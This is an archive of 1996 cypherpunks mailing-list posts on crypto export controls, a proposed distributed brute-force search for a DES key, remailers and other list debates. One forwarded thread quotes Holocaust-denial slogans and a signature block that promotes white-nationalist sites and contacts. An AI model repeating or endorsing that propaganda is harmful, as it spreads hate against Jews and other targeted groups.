supply illegal data to anyone who asks for it.  Something like "just
post your email address and I'll mail you (anonymously) some Holocaust
revisionism" (or Christian literature, or whatever else may be
banned in your particular jurisdiction).  This is the kind of
application where it would seem that the anonymous web pages would be
effective.  Maybe there is not much demand for it, after all.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 23 Jul 1996 20:02:04 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: NSA Lawyers Believe ITARs Would be Overturned
Message-ID: <199607230459.VAA23783@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Jul 96 05:06:06 -0800, tcmay@got.net wrote:

>>Which raises an interesting question:  Why aren't they (still) restricting
>>PC-type computers for export?  While it might not appear to make a great
>>deal of sense either, a PC is just as much a tool for encryption as the
>>software which runs on it.  And it's obvious that given the two scenarios
>>below:
>
>But they _are_ (so far as I know, though I haven't checked recently).
>
>That is, there are export restrictions on computers and programs which can
>perform certain mathematical operations faster than some specfied limit.
>For example, FFTs faster than a certain rate.
>
>My copy of Mathematica, updated less than 18 months ago, says "Not for
>Export," and this was not because it contained any crypto code, but because
>of the performance on certain algorithms (on commonly available machines).

I was wondering why Mathcad had that sticker. It's only 2-3 months old,
BTW.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Bailey" <dan@milliways.org>
Date: Wed, 24 Jul 1996 20:03:16 +0800
To: "trei@process.com>
Subject: Re: DES brute force? (was: Re: Borders *are* transparent)
Message-ID: <199607240036.UAA22733@perseus.ultra.net>
MIME-Version: 1.0
Content-Type: text/plain


If we choose a plaintext/ciphertext pair carefully, we can easily save
ourselves some work (50%) while still making the attack a credible
demonstration.  The idea is to use each trial encryption twice.
	In _Differential Cryptanalysis of the Data Encryption Standard_, Biham and
Shamir note the following, known as the complementation property of DES:

if T = DES(P, K) where T is ciphertext, P plaintext, and k key, then:
T' = DES(P', K') where T', P', and K' are the bitwise complement of the above.

Now the interesting part. If two pairs (P1,T1) and (P2,T2) are available with
P1 = P2' or T1 = T2', then an attacker can restrict his search to only the keys
with LSB = 0.  The attacker runs through the remaining 2^55 keys (with LSB = 0)
and tests the results against both T1 and T2'.  Since testing for equality is
much faster than performing the actual encryption, time savings is on the order
of 50%.

Just a thought on how to save some cycles.
					Dan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 20:03:46 +0800
To: "Bill Olson (EDP)" <a-billol@microsoft.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <c=US%a=_%p=msft%l=RED-16-MSG-960723000701Z-34713@tide21.microsoft.com>
Message-ID: <199607230044.UAA13038@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Bill Olson (EDP)" writes:
> I don't care if it takes my son 6 years to get through 2 grade levels,
> anyone who allows there kid to pack a gun (or a rifle?) should get their
> head examined

Why? What, objectively, is wrong with allowing, say, a twelve year old
to go plinking with a .22? Lets not hear vitriol -- lets just hear
cold hard reasons not to allow it.

Myself, I'd say that it appears that there is no good objective
reason.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Jul 1996 14:39:34 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <199607230349.UAA03865@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 PM 7/22/96 -0700, Lucky Green wrote:
>At 4:50 7/23/96, Paul Foley wrote:
>>"Peter Trei" <trei@process.com> wrote:
>>
>>   Any one up for a distributed brute force attack on single DES? My
>>   back-of-the-envelope calculations and guesstimates put this on the
>>   hairy edge of doability (the critical factor is how many machines can
>>   be recruited - a non-trivial cash prize would help).
>>
>>Not quite sure what you mean by "doability" -- it's obviously doable,
>>it just depends how long you want to wait.
>>
>>I'm in.
>
>Same here. I think it is about time for another full scale hack. Breaking
>DES would help get our message more than breaking 40bit RC-4 ever did.

So how many keys can (for example) a 100 MHz Pentium try per second?  I 
assume it's known-plaintext.  Even at a million per second, that's still 
somewhere around 35 billion machine-seconds (average) to find the solution.  
1000 systems operating, and it's around a year to a solution.  Doable, but 
not all that practical.


What about the possibility of using DSP's?  Is there any brand of 28.8 K 
modem which uses a "standard" DSP and EPROM firmware?  Such a beast might be 
the easiest way to get a large amount of CPU horsepower operating 
independently of the host computer.  DSP's are optimized to execute a large 
number of instructions with little I/O needs.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 23 Jul 1996 19:10:20 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Canada investigating Net-regulations -- call CBC-Radio now!
In-Reply-To: <v01510103ae1977751dfa@[204.62.128.229]>
Message-ID: <Pine.GUL.3.94.960722193800.9988H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Cypherpunk relevance: Lemire's CD includes both US/Canadian and
international versions of PGP. I say ship the CD to third-world countries
with repressive racist regimes.]

I told the CBC what I thought of the Wiesenthal Center's misguided campaign,
and Lemire, yesterday. 

If you want to know more about Marc Lemire's controversial opinions, the CD
I bought from him recently arrived. The man's got quite an enemies' list,
with closeup GIFs of some big names. If you want a peek, remail me an
encrypted note and we'll work something out.

Connoisseurs of the genre will especially enjoy the commies, pictures\jews,
pictures\leftists, and pictures\traitors directories. I'd prefer to upload
the files to your server, since I don't currently have a spare box with
500MB disk that I can use for this.

People in the SF Bay Area are welcome to borrow the CD, all 528 MB of which
seems to be in the public domain. I've already copied all the files to local
disk. 

Anyone know a place in the South Bay where I could reproduce CDs, cheap? I
know I can beat his $30, but I'm not sure by how much.

Like hell I want to censor this stuff. There's a lot of money to be made
in racism if the price is right. Just ask Lyle Stuart.

Btw, Lemire's the guy who uploaded the Zundelsite files to the mirror sites. 
I include my original correspondence with him, and others -- I hadn't even
heard of any of these five people until I received email from them -- below. 
I have a lot of respect for Hilary and Thomas, who aren't liars.

Pholks interested in phreaking might be interested in Lemire's story at
http://www.webcom.com/ezundel/english/sirc/affidavit_of_marc_lemire.html

You can listen to an interview with Lemire that I copied from his CD-ROM to
http://www.c2.org/~rich/Press/intervw.wav

- -rich
 [blue-ribbon disclaimer: it's called sarcasm, son, SARCASM]
 censor the internet! http://www.stanford.edu/~llurch/potw2/
 boycott fadetoblack! http://www.fadetoblack.com/prquest.htm


Date: Sun, 28 Jan 96 11:10 PST
X-Sender: ezundel@mail.cts.com
Message-Id: <v01530506ad3116a157d7@[204.212.157.52]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: llurch@networking.stanford.edu
From: ezundel@cts.com (E. Zundel)
Status: RO
X-Status:

Hi, Rich -

I just talked to Ernst, and he is very interested in your offer to mirror
his site unedited.  What is involved, technically?  Can you do it on your
own, without my involvement?  I am really, really a novice at the technical
side of it, and so is Ernst.  He said to "absolutely go ahead" if you could
do it and if you give him your word that the material would be unedited and
exactly as we are putting it up - and if you had a question, to please call
him at 416 - 922-9850.  It is his private line, and the man _never_ sleeps!

Please let me know since we don't know from day to day and even from hour
to hour what will happen, what with those massive censorship guns.

Are you a student at Stanford?

All best,

Ingrid

***** Revisionism is the great intellectual adventure at the end of the
Twentieth Century.

***** Revisionismus ist das grosse intellektuelle Abenteuer am Ende des
Zwanzigsten Jahrhunderts.

http://www.webcom.com/ezundel/english


Date:   Sun, 28 Jan 1996 14:34:49 -0800
From: Hilary Ostrov <hostrov@uniserve.com>
Organization: myssiwyg*
X-Mailer: Mozilla 2.0b6a (Win95; I)
MIME-Version: 1.0
To: rich@c2.org
CC: Ken McVay <kmcvay@nizkor.almanac.bc.ca>,
        Jamie McCarthy <jamie@voyager.net>
Subject: Your Comments in the Nizkor Guest Book
X-URL: http://www.almanac.bc.ca/guest-book.html
Content-Type: multipart/mixed; boundary="------------29DD340FADE"

This is a multi-part message in MIME format.

- --------------29DD340FADE
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello Rich,

Thanks for your comments and encouragement in the Nizkor Guest Book.
Indeed you are quite correct: we most definitely agree with your
position that the best response is "meticulous documentation and
refutation, not censorship".

And I certainly hope that others will follow your example of indicating
a preference that people visit Nizkor - in fact, I find it quite sad
that the media will show the way to the denial/racist sites, but neglect
to point the way to Nizkor!

This letter is cc'd to Nizkor Project Director, Ken McVay and
Co-Webmaster, Jamie McCarthy.

____________________________

Your tireless work is greatly appreciated.

I was wondering if you had any comment on Deutsche Telekom's decision to
block access to webcom.com because of our "friend"
Zuendel, though. From a quick look around this site, it appears that
you'd be likely to agree with me that the best response is
meticulous documentation and refutation, not censorship.

To that end, I plan to mirror the "banned" site publicly, on as many
sites as I can muster, until Deutsche Telekom gives up. I will of
course point out that I'd much rather they visited your site.

    Rich Graves
    rich@c2.org
    http://www-leland.stanford.edu/~llurch/
    January 28, 1996
____________________________

=======================
Hilary Ostrov
e-mail: hostrov@uniserve.com 
http://haven.uniserve.com/~hostrov/myssiwyg.html
Co-Webmaster - The Nizkor Project http://www.almanac.bc.ca/

 [Nutscape-enclosed HTML file skipped -- rich]


Message-Id: <199601292012.PAA04388@freeside.echo-on.net>
X-Sender: cpn@echo-on.net (Unverified)
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 29 Jan 1996 15:14:00 -0500
To: llurch@networking.stanford.edu
From: freedom@pathcom.com (Marc Lemire)
Subject: Ernst Zundel

Hello my name is Marc and I am writing you on behalf of Ernst Zundel.


I am wondering if this is the address (llurch@networking.stanford.edu) where
I can send the commpressed Web site documents to as a 'save attached'
message to?

And if you had an FTP site where I could instead of sending them to you,
could put them.

FTP is much easier and faster.


... PS.. The entire site is about ... 30-40 megabytes.  I can strip out all
the Sound files which would leave the site at only maybe 3 megs.



Talk to you soon. 




Thanks


Marc Lemire 


From: Thomas Roessler <Thomas.Roessler@sobolev.rhein.de>
Message-Id: <199601291710.SAA13359@sobolev.rhein.de>
Subject: [FACTS] Germany, or "Oh no not again"
To: cypherpunks@toad.com
Date: Mon, 29 Jan 1996 18:10:09 +0100 (MET)
Cc: Thomas.Roessler@sobolev.rhein.de (Thomas Roessler)
Organization: Qnf eurva.qr-Xbzcybgg.
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

I had the prosecutor's spokesman on phone today.  The result is
that someone gave a hint to the prosecutors which explicitly
mentioned Zundel, T-Online and Compuserve.  Consequently, the
prosecutors *had* to start investigations against Zundel,
T-Online and Compuserve.  In particular, they are right now
*checking* whether providing internet access is a criminal
offence due to the possibility to gain access to `inciting
material' (the German word is `Volksverhetzung') via the Net.

This means that it is not even clear whether the investigations
against internet providers will be dropped or not; in fact many
people believe that these investigatinos *will* be dropped.

My personal guess about all this is that some net.citizens are
trying to have the prosecutors engaged in absolutely absurd
investigations (or, even better, achieve a court room clash on
this subject) to get some clarification of the legal situation of
the Net in Germany.  Quite similar to the RSA T-Shirt story in
the States. ,-)

tlr


Message-Id: <9601292205.AA10683@pathcom.com>
X-Sender: freedom@pathway1.pathcom.com (Unverified)
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0 
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 29 Jan 1996 16:58:11 -0500
To: Rich Graves <llurch@networking.stanford.edu>
From: freedom@pathcom.com (Marc Lemire)
Subject: Re: Ernst Zundel

>I'm firing up an FTP drop box on rosinante.stanford.edu right now... only
>takes a minute.

OK where do I FTP to (exact address).  I tried to ftp to the address above
and it said connection failed.

Do I try to go to Stanford.edu first then to somewhere??

Hope to hear from you soon.

Thanks

Marc
         *******************************************************
         **                DIGITAL FREEDOM BBS                **
         **     Canada's most controversial BBS, access on    **
         ** FIRST call, 100% FREE, NOW 2.1 GIGABYTES ONLINE!! **
         **                        ^^^^^^^^^^^^^^^^^^^^^^^^^^ **
         **        Node 1 (416) 462-3327 28.8 V.34            **
         **        Node 2 (416) 465-4767 14.4 V.42            **
         *******************************************************
                  >>>Or try these other Internet sites<<<
            [WWW]                              [WORLD WIDE WEB]
THE WORLD WIDE LIBRARY OF FREEDOM   ERNST ZUNDEL'S VOICE OF FREEDOM SITE
  http://trend1.com/~phoenix       http://www.webcom.com/~ezundel/english
    FRIENDS OF FREEDOM             http://www.kaiwan.com/~ihrgreg/zundel
  http://alpha.ftcnet.com:80/       STORMFRONT - WHITE NATIONALIST PAGE
  ~cfsl/fof0795.htm                http://stormfront.wat.com/stormfront
        [E-MAIL]                             RESISTANCE RECORDS
MARC LEMIRE: marc.lemire@df.org           http://www.resistance.com
GREG RAVEN: ihrgreg@kaiwan.com             ARYAN CRUSADER'S LIBRARY
DON BLACK: dblack@jbx.com                http://www.io.com/~rlogsdon
HERITAGE FRONT: hf@df.org                   SCRIPTURES FOR AMERICA
ERNST ZUNDEL ezundel@cts.com             http://www.nilenet.com/~tmw/
                             [MAILING LISTS]
     Canadian Patriots Network/Digital Freedom:  cpn@echo-on.net
           Resistance Records:  resist-list@resistance.com
         Aryan News Agency (ANA):  bf221@freenet.carleton.ca
              Stormfront L:  stormfront-l@stormfront.org


From: "Declan B. McCullagh" <declan+@CMU.EDU>
To: Rich Graves <llurch@Networking.Stanford.EDU>
Subject: Re: [NOISY] Deutsche Telekom <--> webcom.com "routing troubles" 
Message-ID: <0l3NAX200bkp0gQ7w0@andrew.cmu.edu>

Excerpts from internet.cypherpunks: 29-Jan-96 [NOISY] Deutsche Telekom
<-.. by Just Rich@c2.org
> Someone please inform Deutsche Telekom and the relevant prosecutors that
> by the time they read this (i.e., within an hour), selected files from
> Zundel's holocaust-denial archives (which make me sick, but that's beside
> the point) will be available at the AFS path:
>
>  /afs/ir.stanford.edu/users/l/llurch/WWW/Not_By_Me_Not_My_Views/

Rich, I'm going to mirror your site at:

file:/afs/cs.cmu.edu/user/declan/www/Not_By_Me_Not_My_Views/

I've just copied everything over, and now I'm creating an index page.
Almost everything, that is. I only have a few megs to spare on this
project; I'm already hosting the damn banned French book.

- -Declan

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfRPxJNcNyVVy0jxAQFw2wIAmhXjIfeme3tSd+DV5G6FFeytUgnv5nou
MtaO8SDTm8yQhTAsrhjqR/nZ42+q9bslzrt7fUjpY8Xdp6F3HedZ9Q==
=vaUP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 24 Jul 1996 03:01:55 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221944.AA00931@Etna.ai.mit.edu>
Message-ID: <199607230210.VAA29324@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


hallam@Etna.ai.mit.edu wrote:
> Ah yes, and since iterated prisoner's dilema games are as
> computationaly complex as the Mandelbrot set (the generator of the
> Mandelbrot is in fact simpler), presumably you can calculate the
> Mandelbrot set in half your brain Perry?

AFAIK, no one can "calculate" the Mandelbrot set precisely. There are 
many points about which you can't say for sure whether they belong to 
the set or not.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 23 Jul 1996 20:22:42 +0800
To: cypherpunks@toad.com
Subject: Re: Home Made Telephone Voice Changer
In-Reply-To: <2.2.32.19960722163544.00331a2c@labg30>
Message-ID: <9yVHRD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


John Deters <jad@dsddhc.com> writes:
> On Wed, 17 Jul 1996, Jerome Tan wrote:
>
> > Does anyone know how to make a home-made telephone voice changer?
>
> Well, if you've got your sound card in your computer, if you download Speak
> Freely (from http://www.fourmilab.ch) and simultaneously turn on LPC-10
> compression along with simple compression, I've found my voice comes out
> more like Robbie the Robot than John Deters.  It's an interesting feature of
> the LPC-10 compression that as it removes redundancy from the transmission
> that it removes the "human identity" from it as well.  There's got to be a
> moral to that story somewhere (especially since the NSA developed the LPC-10
> algorithm).

You can find voicw changers and a lot of other fun toys in the Edge Company
catalog (+1 800 732 9976). They have other electronics, guns, knives, swords,
cross-bows, what have you. No homicidal maniac should be without their
catalog.

It would be an interesting EE project to implement a voice changer in software
using a PC with a sound / phone board.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 14:40:09 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
Message-ID: <v02120d1cae19ff45e1b0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:27 7/22/96, Tom Weinstein wrote:

>Well, for starters, the genius who put it out there put out a beta,
>which has an expiration date, instead of waiting for the final release.
>Secondly, millions of people don't use PGP.

I am sure the final release will be exported the day you release it. The
government will not go after you because some third party violated the law.
Remember, even PRZ was only harassed, never charged. It is my opinion, and
that of many of the legal folks on this list, that the ITAR are
unconstitutional. Netscape is being intimidated by a bluff. And no, I do
not fault Netscape for not forcing the issue.

>Also, notice the simple verification system MIT was allowed to use, and
>the complex one we're required to use.

Sure. The feds are learning. They know that they can't prevent export. They
even know that their regulations don't have a leg to stand on. But they
also know that they can make the life difficult for anyone wanting to make
strong crypto available domestically , thereby reducing the number of
shrink wrap quality programs available for domestic users. Which, let there
be no mistake, is the true reason for the ITAR including software crypto.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sparks@bah.com (Charley Sparks)
Date: Tue, 23 Jul 1996 12:09:37 +0800
To: cypherpunks@toad.com
Subject: A quick question please
Message-ID: <v02140b06ae19d71b996c@[156.80.2.159]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi all, I'm somewhat new to this and was wondering if there is a nice re-
mailer fornt end for the Mac ( Same as Private Idaho ) I have unix, mac and
intel, I use the Mac on the road for good connectivity back to the office and
the net in a small cheep package.

Thanks

Charley Sparks

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMfQnKOJ+JZd/Y4yVAQGEqgQNEhNp1/WfnIoMp3sTJtcuaZTAg7CsvCxc
w3MRCfkkosf2jzRSOvmwJoFmag3I21eCCA7JKhUt+yvtOGyJDxN3fgBl669hZDWG
YE05B8QMaQyHkVIJLe4o6UO+JBCvrEA6jylID/Z41BEJErO+kaN49sbZV0x2nBM9
q4s/ET67KhPt7g==
=u9sO
-----END PGP SIGNATURE-----

                      Charles E. Sparks
         http://www.clark.net/pub/charley/index.htm
           In God we trust, All Others we encrypt
   Public Key at:  http://www.clark.net/pub/charley/cp_1.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 20:32:33 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Netscape
In-Reply-To: <v03007800ae18d6652564@[192.187.162.15]>
Message-ID: <v03007806ae1a02947816@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM -0700 7/22/96, Vladimir Z. Nuri wrote:

>by creating a very large, glaring, and visceral
>public spectacle of the government cracking down on crypto, the
>resulting outcry could be absolutely enormous and resonate throughout
>the entire population. it would be a vivid portrayal of what the
>government has been doing quietly and secretly for decades, and
>perhaps the public might finally understand what is going on.

You're living in a dream world, Vladimir. There's no more going to be a
revolution about this than there was under Stalin, and for similar
reasons--when the government says the security of the State is at risk, and
the public sees explosions and deaths, they are going to go along.

All this will accomplish is ruin it for most everyone else. It reveals the
"monkeywrenchers" for the fascists they are.

"Comrades, comes the revolution you'll all eat strawberries and cream."

"But I don't like strawberries and cream."

"Comrades, comes the revolution, you'll ALL eat strawberries and cream."

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 23 Jul 1996 19:16:30 +0800
To: cypherpunks@toad.com
Subject: Another fascist
In-Reply-To: <199607221350.GAA05921@kiwi.cs.berkeley.edu>
Message-ID: <v03007807ae1a03b2bb71@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


One of the great friends of free speech on this list sent a forged cancel
message to the listbot to try to cancel my subscription.

The listbot, being reasonably well designed, ignored him and told me about
it, though I have no doubt less of a dunce could bring it off.

What a piece of slime! What do others think of this practice?

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Tue, 23 Jul 1996 14:55:10 +0800
To: Peter Trei <trei@process.com>
Subject: DES brute force? (was: Re: Borders *are* transparent)
Message-ID: <18527.9607222028@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Peter Trei <trei@process.com> writes:
> [...] Last September, three or four semi-overlapping efforts
> succeeded in brute-forcing 40 bit RC4 (used in export-quality SSL).
>
> This had three main effects:
> 
> 1. Raising the issue in the media, and thus in the public consciousness.
> 
> 2. Within a month, the government was starting to talk about permitting the
> export of stronger (but GAK'd) encryption products.
>
> 3.  It enabled people like Jeff to argue successfully that releasing
> only an export-strength product was no longer a viable option.In
> practical terms is probably the most important effect of the crack:
> I know of at least one other company where it led directly to the
> release of both domestic and export versions.
>
> Any one up for a distributed brute force attack on single DES? My 
> back-of-the-envelope calculations and guesstimates put this on the
> hairy edge of doability (the critical factor is how many machines can
> be recruited - a non-trivial cash prize would help).

Hmm, 56 bits is a lot of bits... 

Here's some calcuations of my own for your criticism...

using libdes-3.23 

	ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-3.23.tar.gz

running the "speed" application, on a 100Mhz SGI R4000 Indy, I get
~600k key shedules / sec.  (With the ~Mb/s throughput for encrypt, the
bottle neck for simplistic brute force is going to be key scheduling).

56 bits = 72057594037927936 worst case
	= 3800 years

ouch!

So ideally for a break you would like the whole thing to be completed
in say 2 weeks wall clock time, which gives rise to the need for
~100,000 machines of similar throughput, full-time for two weeks.

Possible?

As far as cash prizes go how much could cypherpunks and friends
generate for such a purpose?  I'd guess individuals could come up with
a fair bit of money... 1000+ list members x 10$ = 10k (or whatever).

Also perhaps there are some commercial backers with interests in
seeing ITAR squished who might be persuaded to donate?

Somebody would need to spend a fair bit of effort publicising it on
USENET, to get a good response.

There may be problems associated with offering prize money... what if
some employees at DES hardware vendors `borrowed' some time on their
top of the range DES cruncher?  Perhaps this doesn't matter, as it
would just make the point even more strongly :-)

Also I can't help wondering if there isn't some lateral thinking we
can do to reduce the cost...

Are there cheap (<100$) PC DES cards which would help significantly?

What DES modes are used in typical banking situations?  (I am
presuming a challenge involving a widely used banking funds transfer
protocol would be a suitably juicy targets, based on a criteria of
demonstrating the greatest financial risk).

Are there any practical published attacks on DES which have space /
time trade offs which improve on simplistic brute force whilst still
having relatively low memory requirements for each node, and very low
communication requirements?

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 23 Jul 1996 20:02:28 +0800
To: cypherpunks@toad.com
Subject: Re: Boobytraps and the American Legal System
In-Reply-To: <ae198c8e1402100478ac@[205.199.118.202]>
Message-ID: <199607230435.VAA24145@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > Agree, very foolish to ever plant boobytraps in one's own
 > home.

The problem that I would have with boobytrapping my home is that
there are numerous people (police, firepersons, maintainance
workers, etc...) who might have a legitimate reason to try and
gain entry.  An automatic device cannot anticipate some
complicated scenario which might play itself out while I was
away, such as someone with a medical emergency trying to get to a
phone, or public service personnel needing to gain entrance to
fight a fire or to search for people to evacuate in case of a
biological or chemical accident.

The other reason I wouldn't do such a thing is that I do not own
anything that I consider worth death or serious injury to another
human being.  I recognize that this is a personal view, and
others opinions on the value of their possessions may differ from
mine.

Regarding the topic of children with guns, I recall a classmate
of mine whose father gave him a loaded rifle to keep in his room
for "protection" when he reached the advanced age of 12.  That
very night, he got scared when he thought he heard an intruder
sneaking up the stairs, and emptied the gun into his dog.  He
really loved the dog, and the whole experience was very
traumatizing for him.

Statistically, guns in the home are far more likely to be used to
shoot someone in a domestic dispute, or to be taken away by a
criminal and used against the homeowner, than they are to be used
to defend the homeowner against injury.  I can see very little
purpose for guns in densely populated urban settings, where
people tend to be paranoid, and stray bullets can hit almost
anyone.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Tue, 23 Jul 1996 19:43:09 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
In-Reply-To: <199607221420.HAA00786@toad.com>
Message-ID: <v03007803ae1a08ca5dc1@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>"Peter Trei" <trei@process.com> wrote:
>
>   Any one up for a distributed brute force attack on single DES? My 
>   back-of-the-envelope calculations and guesstimates put this on the
>   hairy edge of doability (the critical factor is how many machines can
>   be recruited - a non-trivial cash prize would help). 
>
I'll be there.
I have a pair of PowerPC machines that I can donate for a week or so.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 23 Jul 1996 22:38:58 +0800
To: Alan Horowitz <tcmay@got.net>
Subject: Re: Boycotts and Etiquette
In-Reply-To: <ae18344f000210049773@[205.199.118.202]>
Message-ID: <v03007808ae1a05e84034@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:04 AM -0700 7/22/96, Alan Horowitz wrote:
>My own decision to not interlocute with Sternlight is premised as
>follows:  His viewpoint is invariant and, by now, efficiently disseminated.
>Briefly, he is a Statist and he never heard of any degree of Statism that
>offends his sensibilities.

You, sir, are an ignoramus. I mean by that that you have not read any
significant volume of my posts, in many of which I vigorously oppose such
things as the Digital Telephony Bill, and yet you pronounce freely on
something about which you know little.

Although I sometimes agree with sentiments here for logical and policy
reasons, and sometimes disagree for the same reasons, you apparently think
that unless someone agrees lock-step with you they are rubber stamps for
the "other side".
You have a lot to learn.

And by the way "statist" is an empty taunt. But then, perhaps you think the
Founding Fathers were statists, and the Constitution a tool of the devil.

> I understand he's old enough to have been
>around when Stalin was still running things in the USSR.  David probably
>was finding good things to say about Old Joe.

Actually, though fairly young at the time, I was horror-stricken. That's
one man I never had a good word for. I was amazed that most
fellow-travelers didn't see it until his pact with Hitler.

> And more importantly,
>about J Edgar Hoover.

Though your black and white mentality can't accomodate it, Hoover did at
least one major positive thing for civil liberties, amid the morass of his
high-handed offenses. That was to refuse to go along with the Nixon White
House's "Houston Plan". He said flat out it was unconstitutional and he
wouldn't do it. They tried every way they could to get around him, but
failed. It's all been documented in Senate hearings and with the source
documents. Now some say Hoover did this for his own reasons but be that as
it may, on that occasion he saved the Constitution, and despite his sins I
think he died shriven.

>
>I pay by the minute for my internet access; many others do as well. If I
>decide to ignore Sternlight, it is a business decision, not a moral one.

You are free to ignore anyone you like for any reason, or no reason. I urge
you to kill file me if you don't want to read my stuff. If you have a mail
reader I'm familiar with, I'd even be happy to give you instructions on how
to do it.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 23 Jul 1996 20:26:52 +0800
To: cypherpunks@toad.com
Subject: Intel, Microsoft doing Internet Phone Software
Message-ID: <01I7DZYQD30W9EDD2U@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would be curious if the standards mentioned include any cryptographic
capabilities. The PGPhone people might want to look into producing a patch for
the Intel (and later Microsoft) programs allowing encryption. (In consideration
of fair use, I am both editing it down and putting on the same ad I see (I use
lynx).)
	-Allen

>   [The New York Times]

>   _ Monday July 22 6:03 PM EDT _
   
>Intel Unveils Internet Phone Application

>   SAN FRANCISCO, Calif. (Reuter) - In its quest to make the personal
>   computer an indispensable tool, Intel Corp. Monday unveiled software
>   that will make it easy to place long-distance phone calls over the
>   Internet.
   
>   The Intel Internet Phone software is the first to allow users of
>   different types of computers and software to link up, solving a
>   problem that has held back use of the global computer network for
>   long-distance telephone calls, even though it would save long-distance
>   toll charges.
   
>   Intel's software uses a telcommunications standard that allows users
>   of different computers and telephone software to talk to each other.
